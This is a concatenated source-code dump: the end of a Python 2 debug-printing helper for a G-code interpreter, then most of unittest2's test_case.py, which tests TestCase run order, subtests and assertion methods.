if len(args) > 0:
n = int(args[0])
else:
n = 0
b = self.blocks[n]
print "-- blocks[%d]" % (n)
print "line_number=%d o_name=%s p_flag=%d p_number%g q_flag=%d q_number=%g comment=%s" % (b.line_number,b.o_name,b.p_flag,b.p_number,b.q_flag,b.q_number,b.comment)
def show(self,*args):
print "dir(interpreter)=",dir(self)
tooltable(self)
show_block(self,0)
if self.remap_level: show_block(self,self.remap_level)
call_stack(self)
remap_stack(self)
print "active G codes:",self.active_g_codes
print "active M codes:",self.active_m_codes
print "active settings:",self.active_settings
print "parameters:",self.parameters
| lgpl-2.1 |
eformat/vertx-web | vertx-web/src/test/sockjs-protocol/venv/lib/python2.7/site-packages/unittest2/test/test_case.py | 13 | 51351 | import contextlib
from copy import deepcopy
import difflib
import gc
import pickle
import pprint
import re
import sys
import logging
import six
from six import b, u
import unittest2
import unittest2 as unittest
from unittest2.test.support import (
OldTestResult, EqualityMixin, HashingMixin, LoggingResult,
LegacyLoggingResult
)
from .support import captured_stderr
log_foo = logging.getLogger('foo')
log_foobar = logging.getLogger('foo.bar')
log_quux = logging.getLogger('quux')
class MyException(Exception):
pass
class Test(object):
"Keep these TestCase classes out of the main namespace"
class Foo(unittest2.TestCase):
def runTest(self): pass
def test1(self): pass
class Bar(Foo):
def test2(self): pass
class LoggingTestCase(unittest2.TestCase):
"""A test case which logs its calls."""
def __init__(self, events):
super(Test.LoggingTestCase, self).__init__('test')
self.events = events
def setUp(self):
self.events.append('setUp')
def test(self):
self.events.append('test')
def tearDown(self):
self.events.append('tearDown')
class Test_TestCase(unittest2.TestCase, EqualityMixin, HashingMixin):
### Set up attributes used by inherited tests
################################################################
# Used by HashingMixin.test_hash and EqualityMixin.test_eq
eq_pairs = [(Test.Foo('test1'), Test.Foo('test1'))]
# Used by EqualityMixin.test_ne
ne_pairs = [(Test.Foo('test1'), Test.Foo('runTest')),
(Test.Foo('test1'), Test.Bar('test1')),
(Test.Foo('test1'), Test.Bar('test2'))]
################################################################
### /Set up attributes used by inherited tests
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
# ...
# "methodName defaults to "runTest"."
#
# Make sure it really is optional, and that it defaults to the proper
# thing.
def test_init__no_test_name(self):
class Test(unittest2.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test().id()[-13:], '.Test.runTest')
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__valid(self):
class Test(unittest2.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test('test').id()[-10:], '.Test.test')
# "class unittest2.TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__invalid(self):
class Test(unittest2.TestCase):
def runTest(self): raise MyException()
def test(self): pass
try:
Test('testfoo')
except ValueError:
pass
else:
self.fail("Failed to raise ValueError")
# "Return the number of tests represented by the this test object. For
# TestCase instances, this will always be 1"
def test_countTestCases(self):
class Foo(unittest2.TestCase):
def test(self): pass
self.assertEqual(Foo('test').countTestCases(), 1)
# "Return the default type of test result object to be used to run this
# test. For TestCase instances, this will always be
# unittest2.TestResult; subclasses of TestCase should
# override this as necessary."
def test_defaultTestResult(self):
class Foo(unittest2.TestCase):
def runTest(self):
pass
result = Foo().defaultTestResult()
self.assertEqual(type(result), unittest2.TestResult)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
def test_run_call_order__error_in_setUp(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'addError', 'stopTest']
self.assertEqual(events, expected)
# "With a temporary result stopTestRun is called when setUp errors.
def test_run_call_order__error_in_setUp_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'addError',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
def test_run_call_order__error_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "With a default result, an error in the test still results in stopTestRun
# being called."
def test_run_call_order__error_in_test_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addError', 'stopTest', 'stopTestRun']
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
def test_run_call_order__failure_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addFailure',
'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "When a test fails with a default result stopTestRun is still called."
def test_run_call_order__failure_in_test_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addFailure', 'stopTest', 'stopTestRun']
events = []
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
def test_run_call_order__error_in_tearDown(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
self.assertEqual(events, expected)
# "When tearDown errors with a default result stopTestRun is still called."
def test_run_call_order__error_in_tearDown_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
events = []
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "TestCase.run() still works when the defaultTestResult is a TestResult
# that does not support startTestRun and stopTestRun.
def test_run_call_order_default_result(self):
class Foo(unittest2.TestCase):
def defaultTestResult(self):
return OldTestResult()
def test(self):
pass
Foo('test').run()
def _check_call_order__subtests(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2, 3]:
with self.subTest(i=i):
if i == 1:
self.fail('failure')
for j in [2, 3]:
with self.subTest(j=j):
if i * j == 6:
raise RuntimeError('raised by Foo.test')
1 / 0
# Order is the following:
# i=1 => subtest failure
# i=2, j=2 => subtest success
# i=2, j=3 => subtest error
# i=3, j=2 => subtest error
# i=3, j=3 => subtest success
# toplevel => error
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests(self):
events = []
result = LoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'addSubTestSuccess',
'addSubTestFailure', 'addSubTestFailure',
'addSubTestSuccess', 'addError', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def test_run_call_order__subtests_legacy(self):
# With a legacy result object (without a addSubTest method),
# text execution stops after the first subtest failure.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def _check_call_order__subtests_success(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2]:
with self.subTest(i=i):
for j in [2, 3]:
with self.subTest(j=j):
pass
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests_success(self):
events = []
result = LoggingResult(events)
# The 6 subtest successes are individually recorded, in addition
# to the whole test success.
expected = (['startTest', 'setUp', 'test', 'tearDown']
+ 6 * ['addSubTestSuccess']
+ ['addSuccess', 'stopTest'])
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_success_legacy(self):
# With a legacy result, only the whole test success is recorded.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSuccess', 'stopTest']
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_failfast(self):
events = []
result = LoggingResult(events)
result.failfast = True
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
with self.subTest(i=1):
self.fail('failure')
with self.subTest(i=2):
self.fail('failure')
self.fail('failure')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
def test_subtests_failfast(self):
# Ensure proper test flow with subtests and failfast (issue #22894)
events = []
class Foo(unittest.TestCase):
def test_a(self):
with self.subTest():
events.append('a1')
events.append('a2')
def test_b(self):
with self.subTest():
events.append('b1')
with self.subTest():
self.fail('failure')
events.append('b2')
def test_c(self):
events.append('c')
result = unittest.TestResult()
result.failfast = True
suite = unittest.makeSuite(Foo)
suite.run(result)
expected = ['a1', 'a2', 'b1']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework. The initial value of this
# attribute is AssertionError"
def test_failureException__default(self):
class Foo(unittest2.TestCase):
def test(self):
pass
self.assertIs(Foo('test').failureException, AssertionError)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__explicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest2.TestCase):
def test(self):
raise RuntimeError()
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__implicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest2.TestCase):
def test(self):
self.fail("foo")
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "The default implementation does nothing."
def test_setUp(self):
class Foo(unittest2.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().setUp()
# "The default implementation does nothing."
def test_tearDown(self):
class Foo(unittest2.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().tearDown()
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
    # will be a string (either 8-bit or unicode -- again, because the docs
# just say "string")
def test_id(self):
class Foo(unittest2.TestCase):
def runTest(self):
pass
self.assertIsInstance(Foo().id(), six.string_types)
# "If result is omitted or None, a temporary result object is created
# and used, but is not made available to the caller. As TestCase owns the
# temporary result startTestRun and stopTestRun are called.
def test_run__uses_defaultTestResult(self):
events = []
class Foo(unittest2.TestCase):
def test(self):
events.append('test')
def defaultTestResult(self):
return LoggingResult(events)
# Make run() find a result object on its own
Foo('test').run()
expected = ['startTestRun', 'startTest', 'test', 'addSuccess',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
def testShortDescriptionWithoutDocstring(self):
self.assertIsNone(self.shortDescription())
def testShortDescriptionWithOneLineDocstring(self):
"""Tests shortDescription() for a method with a docstring."""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a docstring.')
def testShortDescriptionWithMultiLineDocstring(self):
"""Tests shortDescription() for a method with a longer docstring.
This method ensures that only the first line of a docstring is
returned used in the short description, no matter how long the
whole thing is.
"""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a longer '
'docstring.')
def testAddTypeEqualityFunc(self):
class SadSnake(object):
"""Dummy class for test_addTypeEqualityFunc."""
s1, s2 = SadSnake(), SadSnake()
self.assertNotEqual(s1, s2)
def AllSnakesCreatedEqual(a, b, msg=None):
return type(a) is type(b) is SadSnake
self.addTypeEqualityFunc(SadSnake, AllSnakesCreatedEqual)
self.assertEqual(s1, s2)
# No this doesn't clean up and remove the SadSnake equality func
# from this TestCase instance but since its a local nothing else
# will ever notice that.
def testAssertIs(self):
thing = object()
self.assertIs(thing, thing)
self.assertRaises(self.failureException, self.assertIs, thing, object())
def testAssertIsNot(self):
thing = object()
self.assertIsNot(thing, object())
self.assertRaises(self.failureException, self.assertIsNot, thing, thing)
def testAssertIsInstance(self):
thing = []
self.assertIsInstance(thing, list)
self.assertRaises(self.failureException, self.assertIsInstance,
thing, dict)
def testAssertNotIsInstance(self):
thing = []
self.assertNotIsInstance(thing, dict)
self.assertRaises(self.failureException, self.assertNotIsInstance,
thing, list)
def testAssertIn(self):
animals = {'monkey': 'banana', 'cow': 'grass', 'seal': 'fish'}
self.assertIn('a', 'abc')
self.assertIn(2, [1, 2, 3])
self.assertIn('monkey', animals)
self.assertNotIn('d', 'abc')
self.assertNotIn(0, [1, 2, 3])
self.assertNotIn('otter', animals)
self.assertRaises(self.failureException, self.assertIn, 'x', 'abc')
self.assertRaises(self.failureException, self.assertIn, 4, [1, 2, 3])
self.assertRaises(self.failureException, self.assertIn, 'elephant',
animals)
self.assertRaises(self.failureException, self.assertNotIn, 'c', 'abc')
self.assertRaises(self.failureException, self.assertNotIn, 1, [1, 2, 3])
self.assertRaises(self.failureException, self.assertNotIn, 'cow',
animals)
def testAssertDictContainsSubset(self):
self.assertDictContainsSubset({}, {})
self.assertDictContainsSubset({}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1, 'b': 2})
self.assertDictContainsSubset({'a': 1, 'b': 2}, {'a': 1, 'b': 2})
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictContainsSubset, {'a': 2}, {'a': 1},
'.*Mismatched values:.*')
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictContainsSubset, {'c': 1}, {'a': 1},
'.*Missing:.*')
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictContainsSubset, {'a': 1, 'c': 1},
{'a': 1}, '.*Missing:.*')
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictContainsSubset, {'a': 1, 'c': 1},
{'a': 1}, '.*Missing:.*Mismatched values:.*')
self.assertRaises(self.failureException,
self.assertDictContainsSubset, {1: "one"}, {})
def testAssertEqual(self):
equal_pairs = [
((), ()),
({}, {}),
([], []),
(set(), set()),
(frozenset(), frozenset())]
for a, b in equal_pairs:
# This mess of try excepts is to test the assertEqual behavior
# itself.
try:
self.assertEqual(a, b)
except self.failureException:
self.fail('assertEqual(%r, %r) failed' % (a, b))
try:
self.assertEqual(a, b, msg='foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with msg= failed' % (a, b))
try:
self.assertEqual(a, b, 'foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with third parameter failed' %
(a, b))
unequal_pairs = [
((), []),
({}, set()),
(set([4,1]), frozenset([4,2])),
(frozenset([4,5]), set([2,3])),
(set([3,4]), set([5,4]))]
for a, b in unequal_pairs:
self.assertRaises(self.failureException, self.assertEqual, a, b)
self.assertRaises(self.failureException, self.assertEqual, a, b,
'foo')
self.assertRaises(self.failureException, self.assertEqual, a, b,
msg='foo')
def testEquality(self):
self.assertListEqual([], [])
self.assertTupleEqual((), ())
self.assertSequenceEqual([], ())
a = [0, 'a', []]
b = []
self.assertRaises(unittest2.TestCase.failureException,
self.assertListEqual, a, b)
self.assertRaises(unittest2.TestCase.failureException,
self.assertListEqual, tuple(a), tuple(b))
self.assertRaises(unittest2.TestCase.failureException,
self.assertSequenceEqual, a, tuple(b))
b.extend(a)
self.assertListEqual(a, b)
self.assertTupleEqual(tuple(a), tuple(b))
self.assertSequenceEqual(a, tuple(b))
self.assertSequenceEqual(tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual,
a, tuple(b))
self.assertRaises(self.failureException, self.assertTupleEqual,
tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual, None, b)
self.assertRaises(self.failureException, self.assertTupleEqual, None,
tuple(b))
self.assertRaises(self.failureException, self.assertSequenceEqual,
None, tuple(b))
self.assertRaises(self.failureException, self.assertListEqual, 1, 1)
self.assertRaises(self.failureException, self.assertTupleEqual, 1, 1)
self.assertRaises(self.failureException, self.assertSequenceEqual,
1, 1)
self.assertDictEqual({}, {})
c = { 'x': 1 }
d = {}
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictEqual, c, d)
d.update(c)
self.assertDictEqual(c, d)
d['x'] = 0
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictEqual, c, d, 'These are unequal')
self.assertRaises(self.failureException, self.assertDictEqual, None, d)
self.assertRaises(self.failureException, self.assertDictEqual, [], d)
self.assertRaises(self.failureException, self.assertDictEqual, 1, 1)
def testAssertEqual_shorten(self):
# set a lower threshold value and add a cleanup to restore it
old_threshold = self._diffThreshold
self._diffThreshold = 0
self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))
s = 'x' * 100
s1, s2 = s + 'a', s + 'b'
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[35 chars]' + 'x' * 61
self.assertEqual(str(cm.exception), "'%sa' != '%sb'" % (c, c))
self.assertEqual(s + 'a', s + 'a')
p = 'y' * 50
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[85 chars]xxxxxxxxxxx'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, p, c, p))
p = 'y' * 100
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[91 chars]xxxxx'
d = 'y' * 40 + '[56 chars]yyyy'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, d, c, d))
def testAssertItemsEqual(self):
self.assertItemsEqual([1, 2, 3], [3, 2, 1])
self.assertItemsEqual(['foo', 'bar', 'baz'], ['bar', 'baz', 'foo'])
self.assertRaises(self.failureException, self.assertItemsEqual,
[10], [10, 11])
self.assertRaises(self.failureException, self.assertItemsEqual,
[10, 11], [10])
self.assertRaises(self.failureException, self.assertItemsEqual,
[10, 11, 10], [10, 11])
# Test that sequences of unhashable objects can be tested for sameness:
self.assertItemsEqual([[1, 2], [3, 4]], [[3, 4], [1, 2]])
self.assertItemsEqual([{'a': 1}, {'b': 2}], [{'b': 2}, {'a': 1}])
self.assertRaises(self.failureException, self.assertItemsEqual,
[[1]], [[2]])
# Test unsortable objects
self.assertItemsEqual([2j, None], [None, 2j])
self.assertRaises(self.failureException, self.assertItemsEqual,
[2j, None], [None, 3j])
def testAssertSetEqual(self):
set1 = set()
set2 = set()
self.assertSetEqual(set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, None, set2)
self.assertRaises(self.failureException, self.assertSetEqual, [], set2)
self.assertRaises(self.failureException, self.assertSetEqual, set1, None)
self.assertRaises(self.failureException, self.assertSetEqual, set1, [])
set1 = set(['a'])
set2 = set()
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = set(['a'])
self.assertSetEqual(set1, set2)
set1 = set(['a'])
set2 = set(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = frozenset(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a', 'b'])
set2 = frozenset(['a', 'b'])
self.assertSetEqual(set1, set2)
set1 = set()
set2 = "foo"
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, set2, set1)
# make sure any string formatting is tuple-safe
set1 = set([(0, 1), (2, 3)])
set2 = set([(4, 5)])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
def testInequality(self):
# Try ints
self.assertGreater(2, 1)
self.assertGreaterEqual(2, 1)
self.assertGreaterEqual(1, 1)
self.assertLess(1, 2)
self.assertLessEqual(1, 2)
self.assertLessEqual(1, 1)
self.assertRaises(self.failureException, self.assertGreater, 1, 2)
self.assertRaises(self.failureException, self.assertGreater, 1, 1)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1, 2)
self.assertRaises(self.failureException, self.assertLess, 2, 1)
self.assertRaises(self.failureException, self.assertLess, 1, 1)
self.assertRaises(self.failureException, self.assertLessEqual, 2, 1)
# Try Floats
self.assertGreater(1.1, 1.0)
self.assertGreaterEqual(1.1, 1.0)
self.assertGreaterEqual(1.0, 1.0)
self.assertLess(1.0, 1.1)
self.assertLessEqual(1.0, 1.1)
self.assertLessEqual(1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertLess, 1.1, 1.0)
self.assertRaises(self.failureException, self.assertLess, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertLessEqual, 1.1, 1.0)
# Try Strings
self.assertGreater('bug', 'ant')
self.assertGreaterEqual('bug', 'ant')
self.assertGreaterEqual('ant', 'ant')
self.assertLess('ant', 'bug')
self.assertLessEqual('ant', 'bug')
self.assertLessEqual('ant', 'ant')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertLess, 'bug', 'ant')
self.assertRaises(self.failureException, self.assertLess, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertLessEqual, 'bug', 'ant')
# Try Unicode
self.assertGreater(u('bug'), u('ant'))
self.assertGreaterEqual(u('bug'), u('ant'))
self.assertGreaterEqual(u('ant'), u('ant'))
self.assertLess(u('ant'), u('bug'))
self.assertLessEqual(u('ant'), u('bug'))
self.assertLessEqual(u('ant'), u('ant'))
self.assertRaises(self.failureException, self.assertGreater, u('ant'), u('bug'))
self.assertRaises(self.failureException, self.assertGreater, u('ant'), u('ant'))
self.assertRaises(self.failureException, self.assertGreaterEqual, u('ant'),
u('bug'))
self.assertRaises(self.failureException, self.assertLess, u('bug'), u('ant'))
self.assertRaises(self.failureException, self.assertLess, u('ant'), u('ant'))
self.assertRaises(self.failureException, self.assertLessEqual, u('bug'), u('ant'))
# Try Mixed String/Unicode
self.assertGreater('bug', u('ant'))
self.assertGreater(u('bug'), 'ant')
self.assertGreaterEqual('bug', u('ant'))
self.assertGreaterEqual(u('bug'), 'ant')
self.assertGreaterEqual('ant', u('ant'))
self.assertGreaterEqual(u('ant'), 'ant')
self.assertLess('ant', u('bug'))
self.assertLess(u('ant'), 'bug')
self.assertLessEqual('ant', u('bug'))
self.assertLessEqual(u('ant'), 'bug')
self.assertLessEqual('ant', u('ant'))
self.assertLessEqual(u('ant'), 'ant')
self.assertRaises(self.failureException, self.assertGreater, 'ant', u('bug'))
self.assertRaises(self.failureException, self.assertGreater, u('ant'), 'bug')
self.assertRaises(self.failureException, self.assertGreater, 'ant', u('ant'))
self.assertRaises(self.failureException, self.assertGreater, u('ant'), 'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, 'ant',
u('bug'))
self.assertRaises(self.failureException, self.assertGreaterEqual, u('ant'),
'bug')
self.assertRaises(self.failureException, self.assertLess, 'bug', u('ant'))
self.assertRaises(self.failureException, self.assertLess, u('bug'), 'ant')
self.assertRaises(self.failureException, self.assertLess, 'ant', u('ant'))
self.assertRaises(self.failureException, self.assertLess, u('ant'), 'ant')
self.assertRaises(self.failureException, self.assertLessEqual, 'bug', u('ant'))
self.assertRaises(self.failureException, self.assertLessEqual, u('bug'), 'ant')
def testAssertMultiLineEqual(self):
sample_text = u("""\
http://www.python.org/doc/2.3/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...]
""")
revised_sample_text = u("""\
http://www.python.org/doc/2.4.1/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...] You may provide your
own implementation that does not subclass from TestCase, of course.
""")
sample_text_error = u("""\
- http://www.python.org/doc/2.3/lib/module-unittest.html
? ^
+ http://www.python.org/doc/2.4.1/lib/module-unittest.html
? ^^^
test case
- A test case is the smallest unit of testing. [...]
+ A test case is the smallest unit of testing. [...] You may provide your
? +++++++++++++++++++++
+ own implementation that does not subclass from TestCase, of course.
""")
self.maxDiff = None
        # On Python 3 we skip bytestrings as they fail the string
        # check in assertMultiLineEqual.
changers = [lambda x: x]
if sys.version_info[0] < 3:
changers.append(lambda x: x.encode('utf8'))
for type_changer in changers:
try:
self.assertMultiLineEqual(type_changer(sample_text),
type_changer(revised_sample_text))
except self.failureException:
e = sys.exc_info()[1]
# need to remove the first line of the error message
error_str = str(e)
if not isinstance(error_str, six.text_type):
error_str = error_str.decode('utf8')
error_lines = error_str.split(u('\n'), 1)
if len(error_lines) > 1:
error = error_lines[1]
else:
error = error_lines[0]
self.assertEqual(sample_text_error, error)
def testAssertSequenceEqualMaxDiff(self):
self.assertEqual(self.maxDiff, 80*8)
seq1 = 'a' + 'x' * 80**2
seq2 = 'b' + 'x' * 80**2
diff = '\n'.join(difflib.ndiff(pprint.pformat(seq1).splitlines(),
pprint.pformat(seq2).splitlines()))
# the +1 is the leading \n added by assertSequenceEqual
omitted = unittest2.case.DIFF_OMITTED % (len(diff) + 1,)
self.maxDiff = len(diff)//2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException:
e = sys.exc_info()[1]
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertLess(len(msg), len(diff))
self.assertIn(omitted, msg)
self.maxDiff = len(diff) * 2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException:
e = sys.exc_info()[1]
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
self.maxDiff = None
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException:
e = sys.exc_info()[1]
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
def testTruncateMessage(self):
self.maxDiff = 1
message = self._truncateMessage('foo', 'bar')
omitted = unittest2.case.DIFF_OMITTED % len('bar')
self.assertEqual(message, 'foo' + omitted)
self.maxDiff = None
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
self.maxDiff = 4
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
def testAssertDictEqualTruncates(self):
test = unittest2.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertDictEqual({}, {1: 0})
except self.failureException:
e = sys.exc_info()[1]
self.assertEqual(str(e), 'foo')
else:
self.fail('assertDictEqual did not fail')
def testAssertMultiLineEqualTruncates(self):
test = unittest2.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertMultiLineEqual('foo', 'bar')
except self.failureException:
e = sys.exc_info()[1]
self.assertEqual(str(e), 'foo')
else:
self.fail('assertMultiLineEqual did not fail')
def testAssertEqualSingleLine(self):
sample_text = "laden swallows fly slowly"
revised_sample_text = "unladen swallows fly quickly"
sample_text_error = """\
- laden swallows fly slowly
? ^^^^
+ unladen swallows fly quickly
? ++ ^^^^^
"""
try:
self.assertEqual(sample_text, revised_sample_text)
except self.failureException as e:
error = str(e).split('\n', 1)[1]
self.assertEqual(sample_text_error, error)
def testAssertIsNone(self):
self.assertIsNone(None)
self.assertRaises(self.failureException, self.assertIsNone, False)
self.assertIsNotNone('DjZoPloGears on Rails')
self.assertRaises(self.failureException, self.assertIsNotNone, None)
def testAssertRegex(self):
self.assertRegex('asdfabasdf', r'ab+')
self.assertRaises(self.failureException, self.assertRegex,
'saaas', r'aaaa')
def testAssertRaisesRegex(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
self.assertRaisesRegex(ExceptionMock, re.compile('expect$'), Stub)
self.assertRaisesRegex(ExceptionMock, 'expect$', Stub)
self.assertRaisesRegex(ExceptionMock, u('expect$'), Stub)
def testAssertNotRaisesRegex(self):
self.assertRaisesRegex(
self.failureException, '^Exception not raised$',
